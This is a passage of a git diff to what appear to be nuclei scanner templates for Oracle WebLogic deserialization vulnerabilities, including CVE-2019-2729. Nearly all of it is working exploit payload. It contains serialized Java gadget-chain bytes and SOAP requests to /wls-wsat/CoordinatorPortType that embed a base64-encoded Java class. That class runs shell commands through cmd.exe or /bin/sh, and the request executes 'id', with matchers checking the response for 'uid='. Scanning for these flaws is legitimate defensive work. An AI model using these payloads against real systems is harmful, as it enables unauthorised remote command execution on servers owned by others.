index="4491"><byte>0</byte></void><void index="4492"><byte>33</byte></void><void index="4493"><byte>0</byte></void><void index="4494"><byte>2</byte></void><void index="4495"><byte>0</byte></void><void index="4496"><byte>3</byte></void><void index="4497"><byte>0</byte></void><void index="4498"><byte>1</byte></void><void index="4499"><byte>0</byte></void><void index="4500"><byte>4</byte></void><void index="4501"><byte>0</byte></void><void index="4502"><byte>1</byte></void><void index="4503"><byte>0</byte></void><void index="4504"><byte>26</byte></void><void index="4505"><byte>0</byte></void><void index="4506"><byte>5</byte></void><void index="4507"><byte>0</byte></void><void index="4508"><byte>6</byte></void><void index="4509"><byte>0</byte></void><void index="4510"><byte>1</byte></void><void index="4511"><byte>0</byte></void><void index="4512"><byte>7</byte></void><void index="4513"><byte>0</byte></void><void index="4514"><byte>0</byte></void><void index="4515"><byte>0</byte></void><void index="4516"><byte>2</byte></void><void index="4517"><byte>0</byte></void><void index="4518"><byte>8</byte></void><void index="4519"><byte>0</byte></void><void index="4520"><byte>1</byte></void><void index="4521"><byte>0</byte></void><void index="4522"><byte>1</byte></void><void index="4523"><byte>0</byte></void><void index="4524"><byte>10</byte></void><void index="4525"><byte>0</byte></void><void index="4526"><byte>11</byte></void><void index="4527"><byte>0</byte></void><void index="4528"><byte>1</byte></void><void index="4529"><byte>0</byte></void><void index="4530"><byte>12</byte></void><void index="4531"><byte>0</byte></void><void index="4532"><byte>0</byte></void><void index="4533"><byte>0</byte></void><void index="4534"><byte>47</byte></void><void index="4535"><byte>0</byte></void><void index="4536"><byte>1</byte></void><void index="4537"><byte>0</byte></void><void index="4538"><byte>1</byte></void><void index="4539"><byte>0</byte></void><void index="4540"><byte>0</byte></void><void index="4541"><byte>0</byte></void><void index="4542"><byte>5</byte></void><void index="4543"><byte>42</byte></void><void index="4544"><byte>-73</byte></void><void index="4545"><byte>0</byte></void><void index="4546"><byte>1</byte></void><void index="4547"><byte>-79</byte></void><void index="4548"><byte>0</byte></void><void index="4549"><byte>0</byte></void><void index="4550"><byte>0</byte></void><void index="4551"><byte>2</byte></void><void index="4552"><byte>0</byte></void><void index="4553"><byte>13</byte></void><void index="4554"><byte>0</byte></void><void index="4555"><byte>0</byte></void><void index="4556"><byte>0</byte></void><void index="4557"><byte>6</byte></void><void index="4558"><byte>0</byte></void><void index="4559"><byte>1</byte></void><void index="4560"><byte>0</byte></void><void index="4561"><byte>0</byte></void><void index="4562"><byte>0</byte></void><void index="4563"><byte>60</byte></void><void index="4564"><byte>0</byte></void><void index="4565"><byte>14</byte></void><void index="4566"><byte>0</byte></void><void index="4567"><byte>0</byte></void><void index="4568"><byte>0</byte></void><void index="4569"><byte>12</byte></void><void index="4570"><byte>0</byte></void><void index="4571"><byte>1</byte></void><void index="4572"><byte>0</byte></void><void index="4573"><byte>0</byte></void><void index="4574"><byte>0</byte></void><void index="4575"><byte>5</byte></void><void index="4576"><byte>0</byte></void><void index="4577"><byte>15</byte></void><void index="4578"><byte>0</byte></void><void index="4579"><byte>18</byte></void><void index="4580"><byte>0</byte></void><void index="4581"><byte>0</byte></void><void index="4582"><byte>0</byte></void><void index="4583"><byte>2</byte></void><void index="4584"><byte>0</byte></void><void index="4585"><byte>19</byte></void><void index="4586"><byte>0</byte></void><void index="4587"><byte>0</byte></void><void index="4588"><byte>0</byte></void><void index="4589"><byte>2</byte></void><void index="4590"><byte>0</byte></void><void index="4591"><byte>20</byte></void><void index="4592"><byte>0</byte></void><void index="4593"><byte>17</byte></void><void index="4594"><byte>0</byte></void><void index="4595"><byte>0</byte></void><void index="4596"><byte>0</byte></void><void index="4597"><byte>10</byte></void><void index="4598"><byte>0</byte></void><void index="4599"><byte>1</byte></void><void index="4600"><byte>0</byte></void><void index="4601"><byte>2</byte></void><void index="4602"><byte>0</byte></void><void index="4603"><byte>22</byte></void><void index="4604"><byte>0</byte></void><void index="4605"><byte>16</byte></void><void index="4606"><byte>0</byte></void><void index="4607"><byte>9</byte></void><void index="4608"><byte>112</byte></void><void index="4609"><byte>116</byte></void><void index="4610"><byte>0</byte></void><void index="4611"><byte>4</byte></void><void index="4612"><byte>80</byte></void><void index="4613"><byte>119</byte></void><void index="4614"><byte>110</byte></void><void index="4615"><byte>114</byte></void><void index="4616"><byte>112</byte></void><void index="4617"><byte>119</byte></void><void index="4618"><byte>1</byte></void><void index="4619"><byte>0</byte></void><void index="4620"><byte>120</byte></void><void index="4621"><byte>115</byte></void><void index="4622"><byte>125</byte></void><void index="4623"><byte>0</byte></void><void index="4624"><byte>0</byte></void><void index="4625"><byte>0</byte></void><void index="4626"><byte>1</byte></void><void index="4627"><byte>0</byte></void><void index="4628"><byte>29</byte></void><void index="4629"><byte>106</byte></void><void index="4630"><byte>97</byte></void><void index="4631"><byte>118</byte></void><void index="4632"><byte>97</byte></void><void index="4633"><byte>120</byte></void><void index="4634"><byte>46</byte></void><void index="4635"><byte>120</byte></void><void index="4636"><byte>109</byte></void><void index="4637"><byte>108</byte></void><void index="4638"><byte>46</byte></void><void index="4639"><byte>116</byte></void><void index="4640"><byte>114</byte></void><void index="4641"><byte>97</byte></void><void index="4642"><byte>110</byte></void><void index="4643"><byte>115</byte></void><void index="4644"><byte>102</byte></void><void index="4645"><byte>111</byte></void><void index="4646"><byte>114</byte></void><void index="4647"><byte>109</byte></void><void index="4648"><byte>46</byte></void><void index="4649"><byte>84</byte></void><void index="4650"><byte>101</byte></void><void index="4651"><byte>109</byte></void><void index="4652"><byte>112</byte></void><void index="4653"><byte>108</byte></void><void index="4654"><byte>97</byte></void><void index="4655"><byte>116</byte></void><void index="4656"><byte>101</byte></void><void index="4657"><byte>115</byte></void><void index="4658"><byte>120</byte></void><void index="4659"><byte>114</byte></void><void index="4660"><byte>0</byte></void><void index="4661"><byte>23</byte></void><void index="4662"><byte>106</byte></void><void index="4663"><byte>97</byte></void><void index="4664"><byte>118</byte></void><void index="4665"><byte>97</byte></void><void index="4666"><byte>46</byte></void><void index="4667"><byte>108</byte></void><void index="4668"><byte>97</byte></void><void index="4669"><byte>110</byte></void><void index="4670"><byte>103</byte></void><void index="4671"><byte>46</byte></void><void index="4672"><byte>114</byte></void><void index="4673"><byte>101</byte></void><void index="4674"><byte>102</byte></void><void index="4675"><byte>108</byte></void><void index="4676"><byte>101</byte></void><void index="4677"><byte>99</byte></void><void index="4678"><byte>116</byte></void><void index="4679"><byte>46</byte></void><void index="4680"><byte>80</byte></void><void index="4681"><byte>114</byte></void><void index="4682"><byte>111</byte></void><void index="4683"><byte>120</byte></void><void index="4684"><byte>121</byte></void><void index="4685"><byte>-31</byte></void><void index="4686"><byte>39</byte></void><void index="4687"><byte>-38</byte></void><void index="4688"><byte>32</byte></void><void index="4689"><byte>-52</byte></void><void index="4690"><byte>16</byte></void><void index="4691"><byte>67</byte></void><void index="4692"><byte>-53</byte></void><void index="4693"><byte>2</byte></void><void index="4694"><byte>0</byte></void><void index="4695"><byte>1</byte></void><void index="4696"><byte>76</byte></void><void index="4697"><byte>0</byte></void><void index="4698"><byte>1</byte></void><void index="4699"><byte>104</byte></void><void index="4700"><byte>116</byte></void><void index="4701"><byte>0</byte></void><void index="4702"><byte>37</byte></void><void index="4703"><byte>76</byte></void><void index="4704"><byte>106</byte></void><void index="4705"><byte>97</byte></void><void index="4706"><byte>118</byte></void><void index="4707"><byte>97</byte></void><void index="4708"><byte>47</byte></void><void index="4709"><byte>108</byte></void><void index="4710"><byte>97</byte></void><void index="4711"><byte>110</byte></void><void index="4712"><byte>103</byte></void><void index="4713"><byte>47</byte></void><void index="4714"><byte>114</byte></void><void index="4715"><byte>101</byte></void><void index="4716"><byte>102</byte></void><void index="4717"><byte>108</byte></void><void index="4718"><byte>101</byte></void><void index="4719"><byte>99</byte></void><void index="4720"><byte>116</byte></void><void index="4721"><byte>47</byte></void><void index="4722"><byte>73</byte></void><void index="4723"><byte>110</byte></void><void index="4724"><byte>118</byte></void><void index="4725"><byte>111</byte></void><void index="4726"><byte>99</byte></void><void index="4727"><byte>97</byte></void><void index="4728"><byte>116</byte></void><void index="4729"><byte>105</byte></void><void index="4730"><byte>111</byte></void><void index="4731"><byte>110</byte></void><void index="4732"><byte>72</byte></void><void index="4733"><byte>97</byte></void><void index="4734"><byte>110</byte></void><void index="4735"><byte>100</byte></void><void index="4736"><byte>108</byte></void><void index="4737"><byte>101</byte></void><void index="4738"><byte>114</byte></void><void index="4739"><byte>59</byte></void><void index="4740"><byte>120</byte></void><void index="4741"><byte>112</byte></void><void index="4742"><byte>115</byte></void><void index="4743"><byte>114</byte></void><void index="4744"><byte>0</byte></void><void index="4745"><byte>50</byte></void><void index="4746"><byte>115</byte></void><void index="4747"><byte>117</byte></void><void index="4748"><byte>110</byte></void><void index="4749"><byte>46</byte></void><void index="4750"><byte>114</byte></void><void index="4751"><byte>101</byte></void><void index="4752"><byte>102</byte></void><void index="4753"><byte>108</byte></void><void index="4754"><byte>101</byte></void><void index="4755"><byte>99</byte></void><void index="4756"><byte>116</byte></void><void index="4757"><byte>46</byte></void><void index="4758"><byte>97</byte></void><void index="4759"><byte>110</byte></void><void index="4760"><byte>110</byte></void><void index="4761"><byte>111</byte></void><void index="4762"><byte>116</byte></void><void index="4763"><byte>97</byte></void><void index="4764"><byte>116</byte></void><void index="4765"><byte>105</byte></void><void index="4766"><byte>111</byte></void><void index="4767"><byte>110</byte></void><void index="4768"><byte>46</byte></void><void index="4769"><byte>65</byte></void><void index="4770"><byte>110</byte></void><void index="4771"><byte>110</byte></void><void index="4772"><byte>111</byte></void><void index="4773"><byte>116</byte></void><void index="4774"><byte>97</byte></void><void index="4775"><byte>116</byte></void><void index="4776"><byte>105</byte></void><void index="4777"><byte>111</byte></void><void index="4778"><byte>110</byte></void><void index="4779"><byte>73</byte></void><void index="4780"><byte>110</byte></void><void index="4781"><byte>118</byte></void><void index="4782"><byte>111</byte></void><void index="4783"><byte>99</byte></void><void index="4784"><byte>97</byte></void><void index="4785"><byte>116</byte></void><void index="4786"><byte>105</byte></void><void index="4787"><byte>111</byte></void><void index="4788"><byte>110</byte></void><void index="4789"><byte>72</byte></void><void index="4790"><byte>97</byte></void><void index="4791"><byte>110</byte></void><void index="4792"><byte>100</byte></void><void index="4793"><byte>108</byte></void><void index="4794"><byte>101</byte></void><void index="4795"><byte>114</byte></void><void index="4796"><byte>85</byte></void><void index="4797"><byte>-54</byte></void><void index="4798"><byte>-11</byte></void><void index="4799"><byte>15</byte></void><void index="4800"><byte>21</byte></void><void index="4801"><byte>-53</byte></void><void index="4802"><byte>126</byte></void><void index="4803"><byte>-91</byte></void><void index="4804"><byte>2</byte></void><void index="4805"><byte>0</byte></void><void index="4806"><byte>2</byte></void><void index="4807"><byte>76</byte></void><void index="4808"><byte>0</byte></void><void index="4809"><byte>12</byte></void><void index="4810"><byte>109</byte></void><void index="4811"><byte>101</byte></void><void index="4812"><byte>109</byte></void><void index="4813"><byte>98</byte></void><void index="4814"><byte>101</byte></void><void index="4815"><byte>114</byte></void><void index="4816"><byte>86</byte></void><void index="4817"><byte>97</byte></void><void index="4818"><byte>108</byte></void><void index="4819"><byte>117</byte></void><void index="4820"><byte>101</byte></void><void index="4821"><byte>115</byte></void><void index="4822"><byte>116</byte></void><void index="4823"><byte>0</byte></void><void index="4824"><byte>15</byte></void><void index="4825"><byte>76</byte></void><void index="4826"><byte>106</byte></void><void index="4827"><byte>97</byte></void><void index="4828"><byte>118</byte></void><void index="4829"><byte>97</byte></void><void index="4830"><byte>47</byte></void><void index="4831"><byte>117</byte></void><void index="4832"><byte>116</byte></void><void index="4833"><byte>105</byte></void><void index="4834"><byte>108</byte></void><void index="4835"><byte>47</byte></void><void index="4836"><byte>77</byte></void><void index="4837"><byte>97</byte></void><void index="4838"><byte>112</byte></void><void index="4839"><byte>59</byte></void><void index="4840"><byte>76</byte></void><void index="4841"><byte>0</byte></void><void index="4842"><byte>4</byte></void><void index="4843"><byte>116</byte></void><void index="4844"><byte>121</byte></void><void index="4845"><byte>112</byte></void><void index="4846"><byte>101</byte></void><void index="4847"><byte>116</byte></void><void index="4848"><byte>0</byte></void><void index="4849"><byte>17</byte></void><void index="4850"><byte>76</byte></void><void index="4851"><byte>106</byte></void><void index="4852"><byte>97</byte></void><void index="4853"><byte>118</byte></void><void index="4854"><byte>97</byte></void><void index="4855"><byte>47</byte></void><void index="4856"><byte>108</byte></void><void index="4857"><byte>97</byte></void><void index="4858"><byte>110</byte></void><void index="4859"><byte>103</byte></void><void index="4860"><byte>47</byte></void><void index="4861"><byte>67</byte></void><void index="4862"><byte>108</byte></void><void index="4863"><byte>97</byte></void><void index="4864"><byte>115</byte></void><void index="4865"><byte>115</byte></void><void index="4866"><byte>59</byte></void><void index="4867"><byte>120</byte></void><void index="4868"><byte>112</byte></void><void index="4869"><byte>115</byte></void><void index="4870"><byte>114</byte></void><void index="4871"><byte>0</byte></void><void index="4872"><byte>17</byte></void><void index="4873"><byte>106</byte></void><void index="4874"><byte>97</byte></void><void index="4875"><byte>118</byte></void><void index="4876"><byte>97</byte></void><void index="4877"><byte>46</byte></void><void index="4878"><byte>117</byte></void><void index="4879"><byte>116</byte></void><void index="4880"><byte>105</byte></void><void index="4881"><byte>108</byte></void><void index="4882"><byte>46</byte></void><void index="4883"><byte>72</byte></void><void index="4884"><byte>97</byte></void><void index="4885"><byte>115</byte></void><void index="4886"><byte>104</byte></void><void index="4887"><byte>77</byte></void><void index="4888"><byte>97</byte></void><void index="4889"><byte>112</byte></void><void index="4890"><byte>5</byte></void><void index="4891"><byte>7</byte></void><void index="4892"><byte>-38</byte></void><void index="4893"><byte>-63</byte></void><void index="4894"><byte>-61</byte></void><void index="4895"><byte>22</byte></void><void index="4896"><byte>96</byte></void><void index="4897"><byte>-47</byte></void><void index="4898"><byte>3</byte></void><void index="4899"><byte>0</byte></void><void index="4900"><byte>2</byte></void><void index="4901"><byte>70</byte></void><void index="4902"><byte>0</byte></void><void index="4903"><byte>10</byte></void><void index="4904"><byte>108</byte></void><void index="4905"><byte>111</byte></void><void index="4906"><byte>97</byte></void><void index="4907"><byte>100</byte></void><void index="4908"><byte>70</byte></void><void index="4909"><byte>97</byte></void><void index="4910"><byte>99</byte></void><void index="4911"><byte>116</byte></void><void index="4912"><byte>111</byte></void><void index="4913"><byte>114</byte></void><void index="4914"><byte>73</byte></void><void index="4915"><byte>0</byte></void><void index="4916"><byte>9</byte></void><void index="4917"><byte>116</byte></void><void index="4918"><byte>104</byte></void><void index="4919"><byte>114</byte></void><void index="4920"><byte>101</byte></void><void index="4921"><byte>115</byte></void><void index="4922"><byte>104</byte></void><void index="4923"><byte>111</byte></void><void index="4924"><byte>108</byte></void><void index="4925"><byte>100</byte></void><void index="4926"><byte>120</byte></void><void index="4927"><byte>112</byte></void><void index="4928"><byte>63</byte></void><void index="4929"><byte>64</byte></void><void index="4930"><byte>0</byte></void><void index="4931"><byte>0</byte></void><void index="4932"><byte>0</byte></void><void index="4933"><byte>0</byte></void><void index="4934"><byte>0</byte></void><void index="4935"><byte>12</byte></void><void index="4936"><byte>119</byte></void><void index="4937"><byte>8</byte></void><void index="4938"><byte>0</byte></void><void index="4939"><byte>0</byte></void><void index="4940"><byte>0</byte></void><void index="4941"><byte>16</byte></void><void index="4942"><byte>0</byte></void><void index="4943"><byte>0</byte></void><void index="4944"><byte>0</byte></void><void index="4945"><byte>1</byte></void><void index="4946"><byte>116</byte></void><void index="4947"><byte>0</byte></void><void index="4948"><byte>8</byte></void><void index="4949"><byte>102</byte></void><void index="4950"><byte>53</byte></void><void index="4951"><byte>97</byte></void><void index="4952"><byte>53</byte></void><void index="4953"><byte>97</byte></void><void index="4954"><byte>54</byte></void><void index="4955"><byte>48</byte></void><void index="4956"><byte>56</byte></void><void index="4957"><byte>113</byte></void><void index="4958"><byte>0</byte></void><void index="4959"><byte>126</byte></void><void index="4960"><byte>0</byte></void><void index="4961"><byte>9</byte></void><void index="4962"><byte>120</byte></void><void index="4963"><byte>118</byte></void><void index="4964"><byte>114</byte></void><void index="4965"><byte>0</byte></void><void index="4966"><byte>29</byte></void><void index="4967"><byte>106</byte></void><void index="4968"><byte>97</byte></void><void index="4969"><byte>118</byte></void><void index="4970"><byte>97</byte></void><void index="4971"><byte>120</byte></void><void index="4972"><byte>46</byte></void><void index="4973"><byte>120</byte></void><void index="4974"><byte>109</byte></void><void index="4975"><byte>108</byte></void><void index="4976"><byte>46</byte></void><void index="4977"><byte>116</byte></void><void index="4978"><byte>114</byte></void><void index="4979"><byte>97</byte></void><void index="4980"><byte>110</byte></void><void index="4981"><byte>115</byte></void><void index="4982"><byte>102</byte></void><void index="4983"><byte>111</byte></void><void index="4984"><byte>114</byte></void><void index="4985"><byte>109</byte></void><void index="4986"><byte>46</byte></void><void index="4987"><byte>84</byte></void><void index="4988"><byte>101</byte></void><void index="4989"><byte>109</byte></void><void index="4990"><byte>112</byte></void><void index="4991"><byte>108</byte></void><void index="4992"><byte>97</byte></void><void index="4993"><byte>116</byte></void><void index="4994"><byte>101</byte></void><void index="4995"><byte>115</byte></void><void index="4996"><byte>0</byte></void><void index="4997"><byte>0</byte></void><void index="4998"><byte>0</byte></void><void index="4999"><byte>0</byte></void><void index="5000"><byte>0</byte></void><void index="5001"><byte>0</byte></void><void index="5002"><byte>0</byte></void><void index="5003"><byte>0</byte></void><void index="5004"><byte>0</byte></void><void index="5005"><byte>0</byte></void><void index="5006"><byte>0</byte></void><void index="5007"><byte>120</byte></void><void index="5008"><byte>112</byte></void><void index="5009"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>
+
+      - |
+        POST /wls-wsat/CoordinatorPortType HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Content-Type: text/xml
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>id</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - "soapenv:Envelope"
         part: body
-      - type: word
         words:
-          - "X-Powered-By: Servlet"
-        part: header
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and
+
       - type: status
         status:
           - 200
diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml
index 1e8a70e14b..9d8b0df087 100644
--- a/cves/2019/CVE-2019-2729.yaml
+++ b/cves/2019/CVE-2019-2729.yaml
@@ -9,6 +9,8 @@ info:
   reference:
     - https://www.oracle.com/security-alerts/alert-cve-2019-2729.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2729
+    - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
+    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -21,18 +23,36 @@ requests:
         POST /wls-wsat/CoordinatorPortType HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/xml
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
 
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADk